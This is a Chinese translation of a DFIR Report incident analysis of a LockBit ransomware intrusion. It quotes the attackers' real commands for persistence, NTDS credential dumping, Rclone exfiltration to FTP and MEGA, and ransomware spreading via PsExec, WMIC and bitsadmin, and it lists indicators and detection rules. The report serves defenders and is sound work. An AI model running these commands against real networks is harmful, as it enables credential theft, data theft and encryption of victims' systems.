Cobalt Strike 和一对 SOCKS 代理引发 LockBit 勒索软件事件

【翻译】Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware – The DFIR Report

入侵始于 2024 年 1 月，当时执行了一个名为 setup_wm.exe 的文件，该文件是从 URL hxxps://accessservicesonline.com/setup_wm.exe下载的文件 setup_wm.exe 是一个用于部署 Cobalt Strike 信标的加载器。托管该恶意文件的域名 accessservicesonline[.]com 已被多个安全厂商标记为恶意，并与 Cobalt Strike 相关活动有关。

执行

威胁行为者使用多种方式执行恶意文件。虽然他们在多个主机上创建了计划任务以维持持久性，但他们也手动运行了其中许多任务来执行各种恶意代理工具，如 SystemBC 和 GhostSOCKS。

服务执行也被广泛使用，这在横向移动部分有详细讨论。其他观察到的执行模式依赖于 WMI、批处理脚本和 Psexec，这些在其他特定用途的章节中都有涉及。

持久性

计划任务

我们在环境中的多个系统上识别出多个计划任务。这些任务不仅限于登陆主机，而是在整个被入侵的网络中都有观察到。计划任务配置 XML 示例：

注册表运行键

作为第二种持久性方法，威胁行为者利用 Windows 注册表中的"Run"键，使 GhostSOCKS 有效载荷在用户登录时自动执行。这是通过以下 PowerShell 命令实现的：

powershell -WindowStyle hidden -Command "if (-Not (Test-Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\App')) { Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'App' -Value '%PUBLIC%\Music\svchosts.exe' }"

权限提升

威胁行为者利用进程注入技术，例如注入到合法进程 WUAUCLT.exe 中，以访问关键系统资源，包括 LSASS 内存空间。

此外，威胁行为者创建并执行了具有 SYSTEM 权限的计划任务来维持持久性。例如，他们通过计划任务部署了 DLL 文件（svcmc.dll 和 svcmcc.dll），确保这些文件在系统启动时执行。这些任务是使用以下命令创建和运行的：

schtasks /create /ru SYSTEM /sc ONSTART /tn Update2 /tr "cmd /c rundll32 %PUBLIC%musicsvcmc.dll, MainFunc" schtasks /run /TN Update2

此外，在横向移动过程中利用管理员权限在文件服务器上执行了基于 PowerShell 的 Cobalt Strike 有效载荷。威胁行为者还利用 SMB 传输了 SystemBC DLL 和 Golang 后门等工具，这些工具都是通过 SYSTEM 级别的计划任务执行的。

防御规避

为了欺骗用户，加载器通过使用相同的文件名和可执行文件图标来模仿合法的 Microsoft Windows Media Configuration Utility。

作为其防御规避策略的一部分，威胁行为者采用了多种方法来禁用 Windows Defender。在文件服务器上时，威胁行为者编辑了与 Windows Defender 相关的组策略设置。威胁行为者打开组策略：

威胁行为者关注的部分：

几分钟后在主机上观察到的注册表修改：

下面显示的命令使用 WMIC 在备份服务器上远程创建进程。该进程随后执行了一个 PowerShell 脚本，旨在禁用 Windows Defender 的实时监控。

在多个系统上观察到使用 CreateRemoteThread API 调用向各种合法进程进行进程注入。这种情况发生在初始访问文件和后来的各种 PowerShell Cobalt Strike 信标中。

凭证访问

在凭证访问阶段，威胁行为者利用被注入的 WUAUCLT 进程访问了登陆主机、文件服务器和备份服务器上的 LSASS 内存空间。授予的访问权限为 0x1010 和 0x1fffff，这两者都表明存在凭证窃取活动。

代码 0x1010 的细分如下：

• 0x00000010 (VMRead)： 授予从进程读取内存的能力。
• 0x00001000 (QueryLimitedInfo)： 允许检索某些进程相关信息。

相比之下，代码 0x1fffff 提供了对进程的完全访问权限，这是凭证窃取工具的明显指标。标记为 UNKNOWN 的可疑 CallTrace 也揭示了注入代码活动。

此外，威胁行为者试图通过 PowerShell 远程处理使用 NTDSUtil 提取凭证。然而，这一尝试被 Windows Defender 阻止。

尝试的 NTDS.dit 转储：

C:WindowsSystem32ntdsutil.exe ac in ntds ifm cr fu C:users publicmusic1

Windows Defender 事件日志显示凭证转储尝试被阻止：

在备份服务器上，威胁行为者执行了一个名为 Veeam-Get-Creds.ps1 的 PowerShell 脚本。这个脚本在 GitHub 上公开可用，是一种从 Veeam 备份和复制凭证管理器中恢复密码的方法。

此外，在文件服务器上时，威胁行为者成功定位到了一个与共享账户相关的文件：

信息收集

setup_wm.exe

在初始访问发生约一小时后，观察到来自 Cobalt Strike 信标的一条 PowerShell 命令，运行了著名的 Microsoft nltest 工具来发现 Active Directory 域控制器。

紧接着，威胁行为者立即转向域控制器。但在获得对该主机的横向访问权限后，他们返回到登陆点进行更多的信息收集活动。

大约在同一时间，在登陆点上观察到被注入的进程 WUAUCLT.exe 也在加载 Seatbelt 和 SharpView 模块。

• Seatbelt是一个后渗透工具，旨在收集系统相关信息。它可以收集安全设置、凭证、浏览器历史记录等数据。
• SharpView是一个 AD 侦察工具，可以映射整个 AD 环境并提供用户、组、权限和关系等关键详细信息。

在第一天，威胁行为者在文件服务器上投放了一个二进制文件 check.exe。

这个 Visual Basic GUI 软件接受 IP 地址作为输入，并生成包含相应计算机详细信息的多个文件。

在威胁行为者运行 check.exe 的同时，他们还启动了一个到域控制器的远程 PowerShell 会话，使用 PowerShell 进行 Active Directory 信息收集。

在文件服务器上，威胁行为者多次查看 Windows 任务管理器。

在整个入侵过程中，威胁行为者检查了组策略设置。第一天，他们在文件服务器上检查了 Windows Defender 设置。在最后一天，他们在完成勒索部署后检查了备份服务器。

横向移动

RDP

观察到威胁行为者在入侵期间使用 RDP。在前两天，他们利用文件服务器作为枢纽主机。在最后一天，从登陆主机向文件服务器和备份服务器都发起了 RDP 会话。

虽然收集的数据中缺少正常 4624 事件的身份验证数据，但通过使用 Microsoft-Windows-TerminalServices-LocalSessionManager 事件 ID 21 日志，我们能够识别登录活动。

WinRM

在第一天，威胁行为者使用 WinRM 从文件服务器启动了一个到域控制器的远程 PowerShell 会话。这个会话随后被用来运行 Active Directory 发现命令。这在 Windows PowerShell 日志事件 ID 4103/4104中有记录。

本地主机：

远程主机：

WMI

威胁行为者使用/node 选项在备份服务器上运行远程命令，后来在勒索软件部署期间也使用了这种方法，这在防御规避和影响部分有进一步介绍。

Psexec

威胁行为者使用 Sysinternals 的 Psexec 进行与勒索软件部署相关的远程执行活动，这在影响部分有所提及。

远程服务/SMB

威胁行为者反复利用远程服务在网络内进行横向移动。他们的活动始于将 SystemBC 和 GhostSOCKS 代理工具部署到域控制器。

以下数据显示了用于将代理工具传输到域控制器的 SMB 网络活动：

远程服务创建：

这种远程服务创建也可以通过网络上的 IDS 检测识别，如 ET RPC DCERPC SVCCTL - Remote Service Control Manager Access。

随后，他们使用 Cobalt Strike 的 jump psexec_psh 功能通过远程服务在文件共享服务器和备份服务器上执行 PowerShell 信标。

在初始 Base64 解码后，我们发现有效载荷使用了 Cobalt Strike 默认的 XOR 值 35。

使用 XOR 密钥 35 解码第二层混淆后，我们得到了下一层 base64 字符串。我们可以再次使用 XOR 密钥 35 进行解码。作为下一步，我们可以使用以下 cyber chef 配方。

Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')From_Base64('A-Za-z0-9+/=',true)Gunzip()Label('Decode')Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')Conditional_Jump('',false,'',10)From_Base64('A-Za-z0-9+/=',true)XOR({'option':'Decimal','string':'35'},'Standard',false)

这个 PowerShell 脚本是经过 base64 编码的。解码 PowerShell 后显示 SMB 管道的名称为：

\.pipefullduplex_84

使用 Didier Stevens 的1768.py脚本分析输出结果，发现其与 Cobalt Strike 的 psexec_psh 活动相关的 shellcode 相匹配。

命令与控制

Cobalt Strike (S0154)

初始命令与控制是由 setup_wm.exe 的执行触发的，连接到 compdatasystems.com 的 Cobalt Strike 信标。

作为命令与控制 (C2) 阶段的一部分，威胁行为者通过 443 端口建立了与第二个 Cobalt Strike C2 服务器的连接，该服务器的 IP 地址为 159.100.14.254。与此服务器关联的域名是 retailadvertisingservices[.]com。

在此活动期间，观察到进程注入行为，威胁行为者针对 svchost.exe 等合法进程进行注入。注入活动使他们能够在受信任的系统进程中运行恶意代码。

与这些命令与控制服务器的通信在整个入侵过程中持续进行。

以下是 setup_wm.exe 信标的配置信息：

{"BeaconType": ["HTTPS"    ],"Port": 443,"SleepTime": 62760,"MaxGetSize": 1864954,"Jitter": 37,"C2Server": "compdatasystems.com,/_next.css","HttpPostUri": "/boards","Malleable_C2_Instructions": ["Remove 814 bytes from the beginning","Base64 decode","Base64 decode"    ],"HttpGet_Verb": "GET","HttpPost_Verb": "POST","HttpPostChunk": 0,"Spawnto_x86": "%windir%\syswow64\WUAUCLT.exe","Spawnto_x64": "%windir%\sysnative\WUAUCLT.exe","CryptoScheme": 0,"Proxy_Behavior": "Use IE settings","Watermark": 1357776117,"bStageCleanup": "True","bCFGCaution": "False","KillDate": 0,"bProcInject_StartRWX": "False","bProcInject_UseRWX": "False","bProcInject_MinAllocSize": 10425,"ProcInject_PrependAppend_x86": ["kJCQkJCQkJA=","Empty"    ],"ProcInject_PrependAppend_x64": ["kJCQkJCQkJA=","Empty"    ],"ProcInject_Execute": ["CreateThread","RtlCreateUserThread","CreateRemoteThread"    ],"ProcInject_AllocationMethod": "VirtualAllocEx","bUsesCookies": "True","HostHeader": "Host: user.compdatasystems.com"}

SystemBC

通过动态分析，我们能够确定几个被投放的文件为 SystemBC。

与 SystemBC 命令控制服务器的通信从第一天开始，并持续了整个入侵过程。

GhostSOCKS

分析揭示另一个部署的代理是 GhostSOCKS，这是一个恶意软件即服务 (MaaS) 工具。

这些二进制文件被部署在登陆主机以及文件共享服务器和备份服务器上。执行后，这些二进制文件连接到以下命令控制服务器：

与 GhostSocks 服务器的通信仅在第一天被观察到。

数据窃取

威胁行为者从文件共享服务器打开 Internet Explorer 并访问了两个网站：qaz[.]im 和 temp[.]sh。

这两个网站都是已知的匿名临时文件共享服务。威胁行为者经常使用它们来部署工具或有效载荷，但在这种情况下，我们没有观察到任何下载。这使我们评估他们可能使用这些网站进行了一些小规模的数据窃取。

大约 20 分钟后，威胁行为者转向使用 Rclone 进行大规模数据窃取。

他们最初尝试使用 Rclone 进行数据窃取时，使用了一个 FTP 配置，目标是端口 21 上的远程服务器 93.115.26.127。这次数据窃取尝试失败了，因为无法建立与远程服务器的连接。

执行的命令是：

"%PUBLIC%Musicrclone.exe" copy E:REDACTEDcustomers ftp1:REDACTED/customers -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

两小时后，威胁行为者改变了策略，利用 Rclone 的 MEGA 集成功能将数据窃取到Mega.io。在这第二次尝试中执行了以下命令：

%WINDIR%system32cmd.exe /C .rclone.exe copy "E:REDACTEDdomain" mega:REDACTED/domain -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

初始尝试成功地将数据窃取到Mega.io存储服务。第二天，威胁行为者利用第二个 FTP 账户和硬编码在 rclone 配置中的另一个服务器，再次成功实施了数据窃取。

对网络日志的分析显示，在 16 小时的时间内窃取了数千兆字节的数据。

影响

在第十一天，威胁行为者开始部署勒索软件。这个最终阶段包括了在网络中部署的准备步骤。整个过程始于执行名为 SETUP.bat 的批处理脚本，该脚本创建了一个暂存文件共享：

"%WINDIR%System32cmd.exe" /C "%PUBLIC%MusicSETUP.bat"net sessionnet share share$=%PUBLIC%Music /GRANT:Everyone,READ /Y

包括 LockBit 勒索软件加密器、ds.exe、PSExec 以及其他辅助批处理脚本在内的多个文件被上传到这个共享目录中，以便部署勒索软件。这些脚本包含了用于共享勒索软件二进制文件和执行它的冗余机制。

接下来，一个名为 WMI.bat 的脚本利用 WMI 将勒索软件有效载荷从共享目录（SHARE$）复制到本地机器并执行。值得注意的是，威胁行为者并未将目标限制在特定主机上，而是针对已识别子网内的所有可访问主机。有效载荷执行命令如下：

%WINDIR%system32cmd.exe /c ""%PUBLIC%MusicWMI.bat" %PUBLIC%MusicSETUP.bat %PUBLIC%MusicCOPY.bat %PUBLIC%MusicDEF.bat %PUBLIC%Musicds.exe"

WMI 命令进一步促进了有效载荷的分发，利用 bitsadmin 在远程主机上传输和执行勒索软件。这些命令触发了父子进程链，例如 wmiprvse.exe 从 bitsadmin 命令中派生：

wmic /node:ipv4address,REDACTED,REDACTED,REDACTED,REDACTED /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer update_service \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

此外，威胁行为者使用了名为 COPY.bat 的批处理脚本，通过 PSExec 将有效载荷从共享目录复制到目标机器。PSExec 的执行可以通过服务创建事件（事件 ID 7045）和 PSEXESVC.exe 的执行来识别。相关命令如下：

源主机执行 copy.bat 以及扩展的 PsExec.exe ：

PsExec.exe /accepteula @comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY "\REDACTEDshare$ds.exe" "%WINDIR%temp"

1. 源主机执行

%WINDIR%system32cmd.exe /c ""%PUBLIC%Musicshare$COPY.bat"       └── "PsExec.exe /accepteula -d \REDACTED -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

目标主机执行命令将 LockBit 加密器复制到本地机器：

2. 服务执行（目标主机）

PSEXECSVC.exe       └── "cmd" /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

威胁行为者使用名为 EXE1.bat 的批处理文件执行了 LockBit 加密器，该文件利用 PSExec 在主机上运行勒索软件二进制文件 ds.exe，并将其复制到 Windows 临时文件夹中。

从源主机通过 PSExec 执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$EXE1.bat" "       └── C:share$PsExec.exe -d @C:share$comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c %WINDIR%tempds.exe -pass REDACTED

威胁行为者还使用了修改版的 WMI1.bat 通过 WMI 命令分发和执行有效载荷，目标是输入文件中列出的主机。这个阶段展现出与之前类似的进程行为，wmiprvse.exe 生成传输任务：

1. 通过 WMIC 从源主机执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$WMI1.bat" "       └── wmic /node:@C:share$comps1.txt /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

与之前的 WMI 执行类似，在远程主机上，wmiprvse.exe 将负责启动 Bitsadmin 传输任务。

1. 通过 WMIC 在目标主机上执行 LockBit：

wmiprvse.exe       └── cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED           └── bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe

整个部署活动大约持续了两个小时。尽管执行过程中出现了几次错误，但威胁行为者成功部署了 LockBit 勒索软件。被加密的主机显示了修改后的桌面背景，将用户重定向到勒索信。

时间线

钻石模型

指标

原子指标

hxxps://accessservicesonline[.]com/setup_wm.exeCobalt Strike:31.172.83[.]162:443user[.]compdatasystems[.]comcompdatasystems[.]com159.100.14[.]254:443retailadvertisingservices[.]comSystemBC:185.236.232[.]20:445GhostSOCKS:91[.]142[.]74[.]28|30001195[.]2[.]70[.]38|3000138[.]180[.]61[.]247|30001FTP exfiltration servers:93.115.26[.]127:2146.21.250[.]52:21

计算哈希值

File: svchosts.exe6505b488d0c7f3eaee66e3db103d7b05bf2b396b8fb0b1de27678aab877b6f177546d1c5b4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63File: dfg.exe671b967eb2bc04a0cd892ca225eb5034ab1777107d9996e647d43d1194922b810f198514b79bb3302691936df7c3315ff3ba7027f722fc43d366ba354ac9c3dac2e01d03File: svc.dll03af38505cee81b9d6ecd8c1fd896e0e1ac66fcc34c0b86def886e4e168030dae096927c2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4File: Veeam-Get-Creds.ps10f7b6bb3a239cf7a668a8625e63326395263a135f09185aa44f6b73d2f8160f56779706d18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88File: svcmc.dllea327ed0a3243847f7cd87661e22e1de450d54d5737164579416ca99af1eb3fa1d4aaff9ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175File: setup_wm.exe57f791f7477b1f7a1b3605465d054db8bba1bc3ebf07ca3c4e2442f0ba9ea18383ce627bd8b2d883d3b376833fa8e2093e82d0a118ba13b01a2054f8447f57d9fec67030File: check.exe6e91c474d90546845b1f3f9e7a33411a9352236ad6fe8835979cf11ba5033f8f2fef0f193f97e112f0c5ddf0255ef461746a223208dc0846bde2a6dca9c825d9c706a4e9File: svcmcc.dll0aa05ebc3b6667954898cfccc4057600c59cbd309b3393cb08a1133364ed11000fdd418d44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6File: sd.exe2800a10c4afae44978d906b2abaed74584019de427aef1f1e4f32b579767bee6d0bd1e64c1173628f18f7430d792bbbefc6878bced4539c8080d518555d08683a3f1a835File: SETUP.batd9adb3dd6df169e824b2867a2b8cba89b077ea03b207cc8b8b48b9b4f9a58dabbd39f6787673a949181e33ff8ed77d992a2826c25b8da333f9e03213ae3a72bb4e9a705dFile: ds.exe71c8c1a0056fd084bc32a03d9245ad105de1f72ffeea1ecbd287b0ca8ddb2c5264d9acb559c9d10f06f8cb2049df39fb4870a81999fd3f8a79717df9b309fadeb5f26ef9File: EXE1.bat573a213191985c555dd7e8de5f0a9caeaa19a1648d680c3bfbee7dcc3df41ce98af8e121ba9b879fdc304bd7f5554528fb8e858ef36ad4657fedfefb8495f43ce73fc6f1File: EXE.bat4457256150386acec794e9e8ee412691c6d54322a17e754150e61f7caa91226a84b0b77410ce939e4ee8b5285d84c7d694481ebbdf986904938d07f7576d733e830ed012File: COPY.bat6d44c5fb49258f285769e50830fc59afda6771fbbcfaf195b80925cefc880794d62d61bf3af3f2d08aa598ab4f448af1b01a5ad6c0f8e8982488ebf4e7ae7b166e027a8bFile: WMI.bat40852fde665eb9119fcc565bd68de680956e020206c4dc4240537d07be022e86ed918ed1578a2ac45e40a686a5f625bbc7873becd8eb9fe58ea07b1d318b93ee0d127d4eFile: RDP.bat996ad32c7ae2190b7fa7876df0d7b7174a1e667e0c3550f4446903570adbe7776699d4ca791157675ad77b0ae9feabd76f4b73754a7537b7a9a2cc74bd0924d65be680e1File: WMI1.bat90f9044cfee2c678fe51abd098bdfe97e3619582f4d81ca180dee161bbe49d499b237119c4863cc28e01713e6a857b940873b0e5caedfd1fcb9b2a8d07ffb4c0c48379d5File: COPY1.batb254f8f03e61bd9469df66c189d7987145337ae989cd62d07059f867ce62ff6b6fc908199bcaad9184b182965923a141f52fb75ddd1975b99ab080869896cee5879ecfadFile: DEF.bat4794accd22271a28547fb3613ee79218ccc6b5bf9591fa9a3d57fd48ee0c9c49a6d22da953828f56c6894a468a091c8858d2e29144b68d5de8ff1d69a567e97aac996026

检测

网络

ET POLICY PsExec service createdET RPC DCERPC SVCCTL - Remote Service Control Manager AccessET POLICY SMB2 NT Create AndX Request For an Executable FileET POLICY SMB Executable File TransferET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral MovementETPRO MALWARE Cobalt Strike Related Domain in DNS LookupET POLICY Possible Powershell .ps1 Script Use Over SMBET POLICY PE EXE or DLL Windows file download HTTPETPRO MALWARE Unknown Golang Backdoor ActivityETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1ET INFO Abused File Sharing Site Domain Observed (qaz .im) in TLS SNI

Sigma 规则

在 detection.fyi 或 sigmasearchengine.com 上搜索规则

DFIR 公共规则库：

dee0aaa1-b7d7-4be0-ac30-2add7b88d259 : Operator Bring Your Own Tools

DFIR 私有规则：

1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Scriptb878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Executionbaa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes213d8255-f359-410b-ac27-e7e85c6394a8 : Suspicious Binaries in Public Folders6df37102-c993-4133-ad3d-b12ca32e03c6 : Detect Process Creation via WMIC with Remote Node

Sigma 规则库：

9f22ccd5-a435-453b-af96-bf99cbb594d4 : WinAPI Function Calls Via PowerShell Scripts19d65a1c-8540-4140-8062-8eb00db0bba5 : WinAPI Library Calls Via PowerShell Scripts1f49f2ab-26bc-48b3-96cc-dcffbc93eadf : Potential Suspicious PowerShell Keywordsdf69cb1d-b891-4cd9-90c7-d617d90100ce : Suspicious FromBase64String Usage On Gzip Archive : Ps Script1ff315dc-2a3a-4b71-8dde-873818d25d39 : New BITS Job Created Via Bitsadmina762e74f-4dce-477c-b023-4ed81df600f9 : Scheduled Task Created : FileCreation93ff0ceb-e0ef-4586-8cd8-a6c277d738e3 : Scheduled Task Created : Registry87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 : Change PowerShell Policies to an Insecure Levelf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawned734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 : Remote PowerShell Session Host Process (WinRM)8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discoverye4a74e34-ecde-4aab-b2fb-9112dd01aed0 : Dynamic CSharp Compile Artefact61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keysfb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base6489ca78fd-b37c-4310-b3d3-81a023f83936 : Schtasks Creation Or Modification With SYSTEM Privileges3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs1f21ec3f-810d-4b0e-8045-322202e22b4b : Network Connection Initiated By PowerShell Process7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools0e7163d4-9e19-4fa7-9be6-000c61aad77a : CobaltStrike Named Pipe Pattern Regexeeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 : Remote Thread Creation Via PowerShellb5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c : DLL Load By System Process From Suspicious Locations61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations : Registryed74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Toolscdc8da7d-c303-42f8-b08c-b4ab47230263 : Rundll32 Internet Connection1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folderbcb03938-9f8b-487d-8d86-e480691e1d71 : Network Connection Initiated From UsersPublic Foldere37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA : Rclone Execution02ee49e2-e294-4d0f-9278-f5b3212fc588 : New RUN Key Pointing to Suspicious Folder20f0ee37-5942-4e45-b7d5-c5b5db9df5cd : CurrentVersion Autorun Keys Modification69bd9b97-2be2-41b6-9816-fb08757a4d1a : Potentially Suspicious Execution From Parent Process In Public Folderfff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory259e5a6a-b8d2-4c38-86e2-26c5e651361d : PsExec Service File Creation2ddef153-167b-4e89-86b6-757a9e65dcac : File Download Via Bitsadmin To A Suspicious Target Folderd21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Processd059842b-6b9d-4ed1-b5c3-5b89143c6ede : File Download Via Bitsadminfa34b441-961a-42fa-a100-ecc28c886725 : LSASS Access From Program In Potentially Suspicious Folder5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS4f86b304-3e02-40e3-aa5d-e88a167c9617 : Scheduled Task Deletion36210e0d-5b19-485d-a087-c096088885f0 : Suspicious PowerShell Parameter Substring5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE602a1f13-c640-4d73-b053-be9a2fa58b96 : HackTool : Powerup Write Hijack DLL37ae075c-271b-459b-8d7b-55ad5f993dd8 : File or Folder Permissions Modifications178e615d-e666-498b-9630-9ed3630381 : Elevated System Shell Spawned From Uncommon Parent Locatione6e88853-5f20-4c4a-8d26-cd469fd8d31f : Ntdsutil Abuse

Yara 规则

https://github.com/The-DFIR-Report/Yara-Rules/compare/case-27138

ELASTIC_Windows_Ransomware_Lockbit_369E1E94                                                                                                                                                                 MALPEDIA_Win_Lockbit_Auto                                                                                                                                                                                   MAL_RANSOM_LockBit_Apr23_1                                                                                                                                                                                  MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1                                                                                                                                                                SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1                                                                                                                                                                   SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1CobaltStrike_Resources_Httpsstager_Bin_v2_5_through_v4_xCobaltStrike_Resources_Xor_Bin_v2_x_to_v4_xCobaltStrike_Sleep_Decoder_IndicatorCobaltbaltstrike_Beacon_XORed_x86Cobaltbaltstrike_RAW_Payload_https_stager_x86HKTL_CobaltStrike_Beacon_4_2_DecryptHKTL_CobaltStrike_Beacon_StringsHKTL_CobaltStrike_SleepMask_Jul22HKTL_Win_CobaltStrikeSUSP_PS1_JAB_Pattern_Jun22_1WiltedTulip_WindowsTaskWindows_Shellcode_Generic_8c487e57Windows_Trojan_CobaltStrike_3dc22d14Windows_Trojan_CobaltStrike_8d5963a2Windows_Trojan_CobaltStrike_b54b94acWindows_Trojan_Metasploit_24338919Windows_Trojan_Metasploit_38b8ceecWindows_Trojan_Metasploit_7bc0f998Windows_Trojan_Metasploit_c9773203

MITRE ATT&CK 战术框架

Credentials In Files - T1552.001Data Encrypted for Impact - T1486Disable or Modify Tools - T1562.001Domain Account - T1087.002Domain Groups - T1069.002Domain Trust Discovery - T1482Exfiltration Over Alternative Protocol - T1048Exfiltration to Cloud Storage - T1567.002Group Policy Discovery - T1615LSASS Memory - T1003.001Malicious File - T1204.002Masquerading - T1036Match Legitimate Name or Location - T1036.005NTDS - T1003.003PowerShell - T1059.001Process Discovery - T1057Process Injection - T1055Proxy - T1090Registry Run Keys / Startup Folder - T1547.001Remote Desktop Protocol - T1021.001Remote System Discovery - T1018Scheduled Task - T1053.005Service Execution - T1569.002SMB/Windows Admin Shares - T1021.002Web Protocols - T1071.001Windows Command Shell - T1059.003Windows Management Instrumentation - T1047Windows Remote Management - T1028